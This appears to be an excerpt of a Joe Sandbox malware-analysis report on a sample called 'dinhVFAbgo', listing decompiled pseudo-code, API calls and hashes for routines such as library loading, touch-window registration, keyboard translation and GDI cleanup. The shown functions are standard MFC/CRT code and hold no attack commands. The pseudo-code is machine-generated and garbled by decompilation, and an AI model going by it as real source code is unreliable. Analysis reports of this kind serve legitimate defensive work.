__EH_prolog3_GS.LIBCMT ref: 00D7A1C0

Part of subcall function 00D7A0DE: __EH_prolog3.LIBCMT ref: 00D7A0E5
Part of subcall function 00D7A0DE: GetProfileIntA.KERNEL32 ref: 00D7A138
Part of subcall function 00D7A0DE: GetProfileIntA.KERNEL32 ref: 00D7A14E

CopyRect.USER32 ref: 00D7A1F4
GetCursorPos.USER32(?), ref: 00D7A206
SetRect.USER32 ref: 00D7A219
IsRectEmpty.USER32 ref: 00D7A234
InflateRect.USER32(?,00000002,00000002), ref: 00D7A246
DoDragDrop.OLE32(00000000,00000000,?,?), ref: 00D7A28E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Profile$CopyCursorDragDropEmptyH_prolog3H_prolog3_Inflate
String ID:
API String ID: 1837043813-0
Opcode ID: 3ddffd554da180c14c5903de3c09958e645ceccf9e88822feab1f57aef591c2f
Instruction ID: c7a3076abfe6063fec2d6b9b0cae626d15936b0be01693c7f0c1b0b96d5f44bf
Opcode Fuzzy Hash: 3ddffd554da180c14c5903de3c09958e645ceccf9e88822feab1f57aef591c2f
Instruction Fuzzy Hash: 6F314870A0120A9FCB01EFE4CD849EDBBB9FF48700B149019F90AAB255DB709E09DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DF4F65 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00DF4F65(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xe89380 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xe42b30 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00DF478B(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00DF478B(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x00df4f6e
0x00df5018
0x00df4f76
0x00df4f78
0x00df4f7f
0x00df4f81
0x00df4f87
0x00df4f94
0x00df4fa9
0x00df4fad
0x00df4fff
0x00df4fff
0x00df5004
0x00df5008
0x00df500b
0x00df500b
0x00df5011
0x00df5013
0x00df5028
0x00df5023
0x00df5027
0x00df5027
0x00df5015
0x00df5015
0x00000000
0x00df5015
0x00df4faf
0x00df4fb8
0x00df4fef
0x00df4fef
0x00df4ff1
0x00df4ff3
0x00000000
0x00000000
0x00df4ffb
0x00000000
0x00df4ffb
0x00df4fc2
0x00df4fc7
0x00df4fcc
0x00000000
0x00000000
0x00df4fd6
0x00df4fdb
0x00df4fe0
0x00000000
0x00000000
0x00df4fe5
0x00df4feb
0x00000000
0x00df4feb
0x00df4f8c
0x00000000
0x00000000
0x00000000
0x00df4f92
0x00df5021
0x00000000

Strings

api-ms-, xrefs: 00DF4FBC
ext-ms-, xrefs: 00DF4FD0

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: c2cfbb06c2aaeb29a743d24f7a438bca58447e91c247fb6048dc28adf3341010
Instruction ID: 0c285305290296b1ce28fa16bb35ae2555deac72d218bb2c83ba518996b1e49b
Opcode Fuzzy Hash: c2cfbb06c2aaeb29a743d24f7a438bca58447e91c247fb6048dc28adf3341010
Instruction Fuzzy Hash: 8B21C631A05618BBCB214B25AC40E7B37689F01B71B2A8115FF59B7295EA30DD0496F0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4D9F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00CB4D9F(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t20;
				void* _t23;
				intOrPtr _t24;
				intOrPtr* _t25;
				void* _t33;
				intOrPtr* _t34;
				struct HINSTANCE__* _t38;
				intOrPtr* _t41;

				_t26 = __ecx;
				_t33 = __ecx;
				 *(__ecx + 0x38) =  *(__ecx + 0x38) & 0x00000000;
				_t38 = GetModuleHandleW(L"user32.dll");
				if(_t38 == 0) {
					E00CAA4E7(_t23, _t26, _t33, _t38, __eflags);
					asm("int3");
					_push(_t23);
					_push(_t33);
					_t34 = _v12;
					_t9 = _t34 + 0x14;
					 *_t9 =  *((intOrPtr*)(_t34 + 0x14)) - 1;
					__eflags =  *_t9;
					_t24 =  *((intOrPtr*)(_t34 + 0x14));
					if( *_t9 == 0) {
						__eflags = _t34;
						if(_t34 != 0) {
							 *0xe17a64(1, _t38);
							 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x70))))();
						}
					}
					return _t24;
				} else {
					_t25 = GetProcAddress(_t38, "RegisterTouchWindow");
					_t41 = GetProcAddress(_t38, "UnregisterTouchWindow");
					if(_t25 == 0 || _t41 == 0) {
						_t20 = 0;
						__eflags = 0;
					} else {
						if(_a4 != 0) {
							 *0xe17a64( *((intOrPtr*)(_t33 + 0x20)), _a8);
							_t20 =  *_t25();
							 *((intOrPtr*)(_t33 + 0x38)) = _t20;
						} else {
							 *0xe17a64( *((intOrPtr*)(_t33 + 0x20)));
							_t20 =  *_t41();
						}
					}
					return _t20;
				}
			}

0x00cb4d9f
0x00cb4da5
0x00cb4dac
0x00cb4db6
0x00cb4dba
0x00cb4e13
0x00cb4e18
0x00cb4e1c
0x00cb4e1d
0x00cb4e1e
0x00cb4e21
0x00cb4e21
0x00cb4e21
0x00cb4e25
0x00cb4e28
0x00cb4e2a
0x00cb4e2c
0x00cb4e38
0x00cb4e40
0x00cb4e42
0x00cb4e2c
0x00cb4e48
0x00cb4dbc
0x00cb4dce
0x00cb4dd6
0x00cb4dda
0x00cb4e0a
0x00cb4e0a
0x00cb4de0
0x00cb4de4
0x00cb4dfd
0x00cb4e03
0x00cb4e05
0x00cb4de6
0x00cb4deb
0x00cb4df1
0x00cb4df1
0x00cb4de4
0x00cb4e10
0x00cb4e10

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,user32.dll,?,?,00000000,?,00CB349B,00000000,00000000), ref: 00CB4DB0
GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 00CB4DC2
GetProcAddress.KERNEL32(00000000,UnregisterTouchWindow), ref: 00CB4DD0

Strings

UnregisterTouchWindow, xrefs: 00CB4DC8
user32.dll, xrefs: 00CB4DA7
RegisterTouchWindow, xrefs: 00CB4DBC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
API String ID: 667068680-2470269259
Opcode ID: c89d8efe7eda0d759c3f0b1f8d04b458ce2a2052fd46d603d956dd7676b15e6d
Instruction ID: 60a311f31c883078cabe1da6a7867ee64fe0e2fb895a17197fde50fcbe3d68d8
Opcode Fuzzy Hash: c89d8efe7eda0d759c3f0b1f8d04b458ce2a2052fd46d603d956dd7676b15e6d
Instruction Fuzzy Hash: 3711BE32609315AFC7141FA6EC489EEFB69FF54B61F044126F925A3611CBB0EE508BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB133E Relevance: 10.6, APIs: 7, Instructions: 68COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00CB135B
GetWindowRect.USER32 ref: 00CB137F
ScreenToClient.USER32 ref: 00CB138C
ScreenToClient.USER32 ref: 00CB1399
EqualRect.USER32 ref: 00CB13A4
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 00CB13CB
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 00CB13D5

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 410fe2007e8abe9ec38034c124a2186f97a5f068b901e05da10150424817a924
Instruction ID: f556efd8de868472b528e0b3df14785047b003af5a0dc0f6d4df01b504c09625
Opcode Fuzzy Hash: 410fe2007e8abe9ec38034c124a2186f97a5f068b901e05da10150424817a924
Instruction Fuzzy Hash: E1212F7590421AEFCB01DFA9DD84DEEBBF9FF09700F144069E941E6254E7309A04DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D244CC Relevance: 10.6, APIs: 7, Instructions: 66
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00D244CC(void* __ebx, void* __edx, int _a4) {
				signed int _v8;
				char _v264;
				char _v267;
				char _v268;
				short _v272;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HKL__* _t23;
				int _t29;
				void* _t34;
				void* _t40;
				int _t41;
				signed int _t43;
				void* _t44;
				void* _t46;

				_t40 = __edx;
				_t34 = __ebx;
				_t16 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t16 ^ _t43;
				_t41 = _a4;
				_t44 = _t41 - 0x60 - 9;
				if(_t44 > 0) {
					L2:
					if( *0xe8736c != 0) {
						goto L7;
					} else {
						_t46 = _t41 - 0x41 - 0x19;
						if(_t46 <= 0) {
							L6:
							_t29 = _t41;
						} else {
							GetAsyncKeyState(0x12);
							asm("bt ax, 0xf");
							if(_t46 < 0) {
								goto L6;
							} else {
								_t29 = E00DF0F03(_t41);
							}
						}
					}
				} else {
					GetAsyncKeyState(0x12);
					asm("bt ax, 0xf");
					if(_t44 >= 0) {
						L7:
						_v272 = 0;
						GetKeyboardState( &_v264);
						_t23 = GetKeyboardLayout( *(E00CAC67F() + 0x30));
						_t42 = _t23;
						ToAsciiEx(_t41, MapVirtualKeyA(_t41, 0),  &_v264,  &_v272, 1, _t23);
						_v268 = _v272;
						_v267 = 0;
						CharUpperA( &_v268);
						_t29 = _v268;
					} else {
						goto L2;
					}
				}
				return E00DDCBCE(_t29, _t34, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x00d244cc
0x00d244cc
0x00d244d5
0x00d244dc
0x00d244e1
0x00d244e7
0x00d244ea
0x00d244fb
0x00d24502
0x00000000
0x00d24504
0x00d24507
0x00d2450a
0x00d24524
0x00d24524
0x00d2450c
0x00d2450e
0x00d24514
0x00d24519
0x00000000
0x00d2451b
0x00d2451c
0x00d24521
0x00d24519
0x00d2450a
0x00d244ec
0x00d244ee
0x00d244f4
0x00d244f9
0x00d24528
0x00d2452a
0x00d24538
0x00d24546
0x00d2454f
0x00d2456a
0x00d24576
0x00d24583
0x00d2458a
0x00d24590
0x00000000
0x00000000
0x00000000
0x00d244f9
0x00d245a4

APIs

GetAsyncKeyState.USER32(00000012), ref: 00D244EE
GetAsyncKeyState.USER32(00000012), ref: 00D2450E
GetKeyboardState.USER32(?,00E8860C,00000000), ref: 00D24538
GetKeyboardLayout.USER32(?), ref: 00D24546
MapVirtualKeyA.USER32 ref: 00D24551
ToAsciiEx.USER32(?,00000000,?,?,00000001,00000000), ref: 00D2456A
CharUpperA.USER32(?), ref: 00D2458A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: State$AsyncKeyboard$AsciiCharLayoutUpperVirtual
String ID:
API String ID: 1513035088-0
Opcode ID: cf03d234d40bc8205d635fb15035acf01b2ba08230ff6936ad1a7d860b3c7bca
Instruction ID: a4eed76fd6cb25c0892b24ebe2dc56ebd18d7e2a5cfa755fedfb65c13d94a803
Opcode Fuzzy Hash: cf03d234d40bc8205d635fb15035acf01b2ba08230ff6936ad1a7d860b3c7bca
Instruction Fuzzy Hash: 5B21D5304081289FCB14EF65DC49BEDBBB8FF26705F0041AAE5C5A3191DAB49A89DF71

Uniqueness

Uniqueness Score: -1.00%

Function 00CDCBFB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00CDCBFB(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t44;
				int _t45;
				void* _t50;
				void* _t58;
				signed int _t59;
				void* _t63;
				void* _t73;
				signed int _t74;
				void* _t76;
				intOrPtr _t82;
				void* _t85;
				void* _t86;
				signed int _t89;
				void** _t90;
				void* _t91;
				intOrPtr _t92;

				_t76 = __ecx;
				_push(__ebx);
				_push(__esi);
				_t89 = _a4;
				_t73 = __ecx;
				_push(__edi);
				if( *((intOrPtr*)(__ecx + 0x40)) != 0) {
					SelectObject( *0xe87314,  *(_t89 + 4));
					E00CB83BD(0, _t89);
				}
				_t44 = SelectObject( *0xe87310,  *(_t89 + 8));
				_t90 =  &_v20;
				 *((intOrPtr*)(_t73 + 0x64)) = 0;
				 *((intOrPtr*)(_t73 + 0x68)) = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t85 = _t73 + 0x6c;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if( *((intOrPtr*)(_t73 + 8)) != 0x20) {
					_t45 =  *(_t73 + 0xa8);
				} else {
					_t45 = _t44 | 0xffffffff;
				}
				if( *((intOrPtr*)(_t73 + 0x20)) != 0 || _t45 != 0xffffffff) {
					_t46 =  *(_t73 + 0xa4);
					if( *(_t73 + 0xa4) == 0) {
						E00CAA4E7(_t73, _t76, _t85, _t90, __eflags);
						asm("int3");
						_push(0xc);
						E00DDD52C(0xe0a838, _t73, _t85, _t90);
						_t86 = _t76;
						_t74 = _a4;
						__eflags = _t74;
						if(_t74 < 0) {
							L31:
							_t50 = 0;
							__eflags = 0;
						} else {
							__eflags = _t74 -  *((intOrPtr*)(_t86 + 4));
							if(_t74 >=  *((intOrPtr*)(_t86 + 4))) {
								goto L31;
							} else {
								_t82 =  *((intOrPtr*)(_t86 + 8));
								_t91 = 0x20;
								__eflags = _t82 - 4;
								if(_t82 == 4) {
									L20:
									__eflags = _t82 - _t91;
									_t27 = _t82 != _t91;
									__eflags = _t27;
									_t28 = (0 | _t27) + 4; // 0x4
									_t91 = _t28;
								} else {
									__eflags = _t82 - 8;
									if(_t82 == 8) {
										_push(9);
										goto L28;
									} else {
										__eflags = _t82 - 0x10;
										if(_t82 == 0x10) {
											_push(0x11);
											goto L28;
										} else {
											__eflags = _t82 - 0x18;
											if(_t82 == 0x18) {
												_push(0x19);
												L28:
												_pop(_t91);
											} else {
												__eflags = _t82 - _t91;
												if(_t82 != _t91) {
													goto L20;
												}
											}
										}
									}
								}
								E00CD7052( &_v28);
								_t78 =  &_v28;
								_v8 = 0;
								E00CD7432( &_v28, _t86,  *((intOrPtr*)(_t86 + 0x54)),  *((intOrPtr*)(_t86 + 0x58)), _t91, 0, 0);
								_t58 = CopyImage( *(_t86 + 0x8c), 0, 0, 0, 0x2000);
								_t92 =  *((intOrPtr*)(_t86 + 0xa8));
								_v20 = _t58;
								__eflags = _t92 - 0xffffffff;
								if(__eflags == 0) {
									_t92 =  *((intOrPtr*)(E00CC19ED() + 0x1c));
									_t58 = _v20;
								}
								_t59 = E00CB9E25(_t74, _t78, _t82, _t86, _t92, __eflags, _t58);
								__eflags = _t59;
								if(__eflags != 0) {
									_t59 =  *(_t59 + 4);
								}
								_push(_t92);
								_push(_t59);
								_push(_v24);
								E00CC1D2D(_t74, _t78, _t86, _t92, __eflags);
								E00CB83BD(_t86,  &_v20);
								_push(0);
								_push(_t74);
								_push(_v24);
								_t63 = E00CC1E05(_t74, _t78, _t86, _t92, __eflags);
								E00CD70A9( &_v28, __eflags);
								_t50 = _t63;
							}
						}
						return E00DDD4FA(_t50);
					} else {
						E00CBA251( *((intOrPtr*)(_t73 + 0x48)),  *((intOrPtr*)(_t46 + 4)));
						 *(_t73 + 0xa4) =  *(_t73 + 0xa4) & 0x00000000;
						DeleteObject(E00CB9D20(_t73, _t73 + 0x9c));
						_t45 = DeleteDC(E00CB9CE3(_t73 + 0x44));
						goto L9;
					}
				} else {
					L9:
					if( *0xe872e0 != 0) {
						LeaveCriticalSection(0xe872f8);
					}
					return _t45;
				}
			}

0x00cdcbfb
0x00cdcc01
0x00cdcc02
0x00cdcc03
0x00cdcc06
0x00cdcc08
0x00cdcc0e
0x00cdcc19
0x00cdcc20
0x00cdcc20
0x00cdcc2e
0x00cdcc38
0x00cdcc3b
0x00cdcc3e
0x00cdcc41
0x00cdcc44
0x00cdcc47
0x00cdcc4a
0x00cdcc4d
0x00cdcc50
0x00cdcc51
0x00cdcc52
0x00cdcc53
0x00cdcc54
0x00cdcc5b
0x00cdcc56
0x00cdcc56
0x00cdcc56
0x00cdcc65
0x00cdcc6c
0x00cdcc74
0x00cdccc4
0x00cdccc9
0x00cdccca
0x00cdccd1
0x00cdccd6
0x00cdccd8
0x00cdccdb
0x00cdccdd
0x00cdcda9
0x00cdcda9
0x00cdcda9
0x00cdcce3
0x00cdcce3
0x00cdcce6
0x00000000
0x00cdccec
0x00cdccec
0x00cdccf1
0x00cdccf2
0x00cdccf5
0x00cdcd0a
0x00cdcd0c
0x00cdcd0e
0x00cdcd0e
0x00cdcd11
0x00cdcd11
0x00cdccf7
0x00cdccf7
0x00cdccfa
0x00cdcd75
0x00000000
0x00cdccfc
0x00cdccfc
0x00cdccff
0x00cdcd71
0x00000000
0x00cdcd01
0x00cdcd01
0x00cdcd04
0x00cdcd6d
0x00cdcd77
0x00cdcd77
0x00cdcd06
0x00cdcd06
0x00cdcd08
0x00000000
0x00000000
0x00cdcd08
0x00cdcd04
0x00cdccff
0x00cdccfa
0x00cdcd17
0x00cdcd1e
0x00cdcd27
0x00cdcd2d
0x00cdcd42
0x00cdcd48
0x00cdcd4e
0x00cdcd51
0x00cdcd54
0x00cdcd5b
0x00cdcd5e
0x00cdcd5e
0x00cdcd62
0x00cdcd67
0x00cdcd69
0x00cdcd7a
0x00cdcd7a
0x00cdcd7d
0x00cdcd7e
0x00cdcd7f
0x00cdcd82
0x00cdcd8b
0x00cdcd90
0x00cdcd92
0x00cdcd93
0x00cdcd96
0x00cdcda0
0x00cdcda5
0x00cdcda5
0x00cdcce6
0x00cdcdb0
0x00cdcc76
0x00cdcc7c
0x00cdcc81
0x00cdcc94
0x00cdcca3
0x00000000
0x00cdcca3
0x00cdcca9
0x00cdcca9
0x00cdccb3
0x00cdccba
0x00cdccba
0x00cdccc1
0x00cdccc1

APIs

SelectObject.GDI32(?,?), ref: 00CDCC19

Part of subcall function 00CB83BD: DeleteObject.GDI32(?), ref: 00CB83CF

SelectObject.GDI32(?,?), ref: 00CDCC2E
DeleteObject.GDI32(00000000), ref: 00CDCC94
DeleteDC.GDI32(00000000), ref: 00CDCCA3
LeaveCriticalSection.KERNEL32(00E872F8), ref: 00CDCCBA

Strings

, xrefs: 00CDCC34

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Object$Delete$Select$CriticalLeaveSection
String ID:
API String ID: 3849354926-3916222277
Opcode ID: 26d04c49ea29ca5e68ebeec3124c21dcadc36b886e30d34dd80cd1e7abbbe94a
Instruction ID: d291643f111f69eb7fc8a9eb77be9b101092bc09c77c2ed950b62f412c64ba44
Opcode Fuzzy Hash: 26d04c49ea29ca5e68ebeec3124c21dcadc36b886e30d34dd80cd1e7abbbe94a
Instruction Fuzzy Hash: F4210571500201EFCF10AF65DDC8AD9BBB8FF81310F108166FE68AA2B2C7B19944DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DFEFBE Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00DFEFBE(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00DFED0A(_t45, 7);
					E00DFED0A(_t45 + 0x1c, 7);
					E00DFED0A(_t45 + 0x38, 0xc);
					E00DFED0A(_t45 + 0x68, 0xc);
					E00DFED0A(_t45 + 0x98, 2);
					E00DF47C5( *((intOrPtr*)(_t45 + 0xa0)));
					E00DF47C5( *((intOrPtr*)(_t45 + 0xa4)));
					E00DF47C5( *((intOrPtr*)(_t45 + 0xa8)));
					E00DFED0A(_t45 + 0xb4, 7);
					E00DFED0A(_t45 + 0xd0, 7);
					E00DFED0A(_t45 + 0xec, 0xc);
					E00DFED0A(_t45 + 0x11c, 0xc);
					E00DFED0A(_t45 + 0x14c, 2);
					E00DF47C5( *((intOrPtr*)(_t45 + 0x154)));
					E00DF47C5( *((intOrPtr*)(_t45 + 0x158)));
					E00DF47C5( *((intOrPtr*)(_t45 + 0x15c)));
					return E00DF47C5( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00dfefc4
0x00dfefc9
0x00dfefd2
0x00dfefdd
0x00dfefe8
0x00dfeff3
0x00dff001
0x00dff00c
0x00dff017
0x00dff022
0x00dff030
0x00dff03e
0x00dff04f
0x00dff05d
0x00dff06b
0x00dff076
0x00dff081
0x00dff08c
0x00000000
0x00dff09c
0x00dff0a1

APIs

Part of subcall function 00DFED0A: _free.LIBCMT ref: 00DFED2F

_free.LIBCMT ref: 00DFF00C

Part of subcall function 00DF47C5: HeapFree.KERNEL32(00000000,00000000,?,00DFED34,?,00000000,?,00000001,?,00DFEFD7,?,00000007,?,?,00DFF47C,?), ref: 00DF47DB
Part of subcall function 00DF47C5: GetLastError.KERNEL32(?,?,00DFED34,?,00000000,?,00000001,?,00DFEFD7,?,00000007,?,?,00DFF47C,?,?), ref: 00DF47ED

_free.LIBCMT ref: 00DFF017
_free.LIBCMT ref: 00DFF022
_free.LIBCMT ref: 00DFF076
_free.LIBCMT ref: 00DFF081
_free.LIBCMT ref: 00DFF08C
_free.LIBCMT ref: 00DFF097

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b3e154199bd8ac9e800482834da42993d63336c72c0fbd17f2a69e6362055136
Instruction ID: 49aff9ddd793d32537d499da58e84d09653283d8e35fa4156f3e16af782d44c4
Opcode Fuzzy Hash: b3e154199bd8ac9e800482834da42993d63336c72c0fbd17f2a69e6362055136
Instruction Fuzzy Hash: 3611847354070CB6E630B7B0CC4BFEB779CEF01700F498914B799A6466EB25B50486B0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB3170 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00CB3170(void* __ecx, void* __edx, void* __fp0, CHAR* _a4) {
				struct HINSTANCE__* _v8;
				struct HRSRC__* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t10;
				struct HINSTANCE__* _t13;
				struct HRSRC__* _t14;
				void* _t18;
				void* _t22;
				struct HINSTANCE__* _t23;
				void* _t26;
				long _t29;
				void* _t30;
				void* _t32;
				void* _t43;

				_t43 = __fp0;
				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t32 = __ecx;
				if(__ecx == 0 ||  *(__ecx + 0x20) == 0 || IsWindow( *(__ecx + 0x20)) == 0) {
					L10:
					_t10 = 0;
					__eflags = 0;
				} else {
					_t39 = _a4;
					if(_a4 == 0) {
						goto L10;
					} else {
						_t29 = 0;
						_t22 = 0;
